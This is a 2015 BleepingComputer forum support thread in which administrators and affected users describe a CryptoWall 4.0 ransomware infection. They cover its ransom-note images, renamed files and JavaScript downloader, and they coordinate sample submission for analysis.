Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

CryptoWall 4.0: Help_Your_Files Ransomware Support Topic


  • Please log in to reply
431 replies to this topic

#1 PresComm

PresComm

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:41 AM

Posted 03 November 2015 - 08:34 AM

Warning some of the specific infection information provided in this topic on subsequent pages could trigger a warning or alert from your Antivirus...avast has already been reported to have done this.

Mod Edit by quietman7...12/22/15

 

Everybody,
 
Appy polly loggies if this is the wrong forum, move if needed.
 
Working at a fast pace, and I will update with what artifacts and items I can as soon as possible, but wanted to let everyone know that a client of ours was hit with a crypto family that is supposedly CryptoWall, but I am not entirely sure that is true.
 
There are "HELP_YOUR_FILES" .PNG files scattered across the system in affected directories, and it traversed SMB connections, too. The .PNG images give pay portal instructions, and it all looks like CryptoWall, but it usually uses "HELP_DECRYPT" files, and I don't see the .HTM or .TXT files with this one. In addition, and this is the big factor, all the files that were affected were completely and utterly renamed ("0ausbffwh.p5", "72lcvn.iv6nn", "x83o8x.ux7", etc.) Shadow Copies appear to have been obliterated, too. Internet searches for the artifact .PNG showed few results, and all of them are brand new.
 
Unfortunately, I was out of the office for the day when this occurred, and the technicians that handled it kinda just blasted things away, so I am try my best to gather artifacts. I am grabbing the registry and file structure list, samples of encrypted files, browser history, logs from various anti-x tools, etc.
 
DecrypterFixer... if this is something you are interested in tackling, would having a copy of an encrypted file and a copy of the pre-encrypted file help? Not sure if that would expedite your usual processes. I am unfamiliar with your magic ways, so just let me know.


Edited by quietman7, 23 December 2015 - 08:02 AM.


BC AdBot (Login to Remove)

 


#2 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 49,566 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:02:41 AM

Posted 03 November 2015 - 08:54 AM

I have advised our Security Colleagues who specialize in crypto malware ransomware with a link to this topic.
.
.
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Microsoft MVP Reconnect 2016
Windows Insider MVP 2017
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#3 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:41 AM

Posted 03 November 2015 - 08:58 AM

Thanks, quietman. I didn't want to reach out to them directly, because I am sure they are very busy.



#4 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 49,566 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:02:41 AM

Posted 03 November 2015 - 09:01 AM

Not a problem. Post any updates as you get them.

Please submit a sample of an encrypted file here (http://www.bleepingcomputer.com/submit-malware.php?channel=3) with a link to this topic:

You can also submit samples of suspicious executables or any malware files that you suspect were involved in causing the infection. Doing that will be helpful with analyzing and investigating.
.
.
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Microsoft MVP Reconnect 2016
Windows Insider MVP 2017
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#5 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:41 AM

Posted 03 November 2015 - 09:10 AM

A sample of an encrypted file was submitted, as was the "HELP_YOUR_FILES" .PNG artifact.



#6 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:41 AM

Posted 03 November 2015 - 09:17 AM

For the record, the file that I submitted for the sample for, I do have a copy of the decrypted file, if that will help.



#7 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:41 AM

Posted 03 November 2015 - 09:31 AM

Okay, I think I found the dropper/downloader for this. I will upload once I have confirmed. I do not have access to my sandbox at the moment, but when I do this evening I will run the sample and collect the downloaded/dropped payload. I will upload both the downloader/dropper and the payload once I have them.


Edited by PresComm, 03 November 2015 - 09:31 AM.


#8 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:41 AM

Posted 03 November 2015 - 10:12 AM

Confirmed that the .ZIP file I submitted was the downloader.



#9 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:02:41 AM

Posted 03 November 2015 - 11:21 AM



Confirmed that the .ZIP file I submitted was the downloader.

 

Could you upload the ZIP file to Mega and PM me the download link?


Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#10 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:41 AM

Posted 03 November 2015 - 11:47 AM

Done. Let me know if you need more info.



#11 kiro_masamune

kiro_masamune

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:USA
  • Local time:01:41 AM

Posted 03 November 2015 - 11:57 AM

Is there any more information on this as of yet. ESET Endpoint did not detect. I can't tell if the agent is still on this machine. My co-worker found the email with the payload. It appears that it downloaded a file names yria.exe and it renamed it to a random 9 digit number .exe. That's all I know so far.

 

If there is any other information needed, I can provide if I can.


Edited by kiro_masamune, 03 November 2015 - 11:58 AM.


#12 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:41 AM

Posted 03 November 2015 - 12:02 PM

ESET is now detecting the downloader, but it did not as of 1:13PM Eastern time yesterday when the infection chain took place for us. Haven't had a chance to play with it yet, because I don't have a sandbox here I can do it with.

 

If WHM or somebody else doesn't update before I get home, I'll run this in the lab. It is a safe bet, though, that your best bet is going to be to restore encrypted files from backup, which you hopefully have available.


Edited by PresComm, 03 November 2015 - 12:06 PM.


#13 Grinler

Grinler

    Lawrence Abrams


  • Admin
  • 43,166 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:02:41 AM

Posted 03 November 2015 - 12:03 PM

We are  on it. Stay tuned.



#14 Passkeycs

Passkeycs

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:12:41 AM

Posted 03 November 2015 - 12:09 PM

We have this too!  Let me know if you need samples.  FYI.  It left all the XLSX files alone.  The owner on all files is "administrators".  We have no sign of infected files on any workstations, and no one got any pop-ups.



#15 PresComm

PresComm
  • Topic Starter

  • Members
  • 109 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:41 AM

Posted 03 November 2015 - 12:09 PM

Kiro, you are definitely seeing the same downloader. I took the time to just view the .JS file's contents, and I can clearly see it reaching out to a public IP and downloading a 9-digit named .EXE file.

 

It did not leave our client's .XLSX files alone, that is a certainty.


Edited by PresComm, 03 November 2015 - 12:10 PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users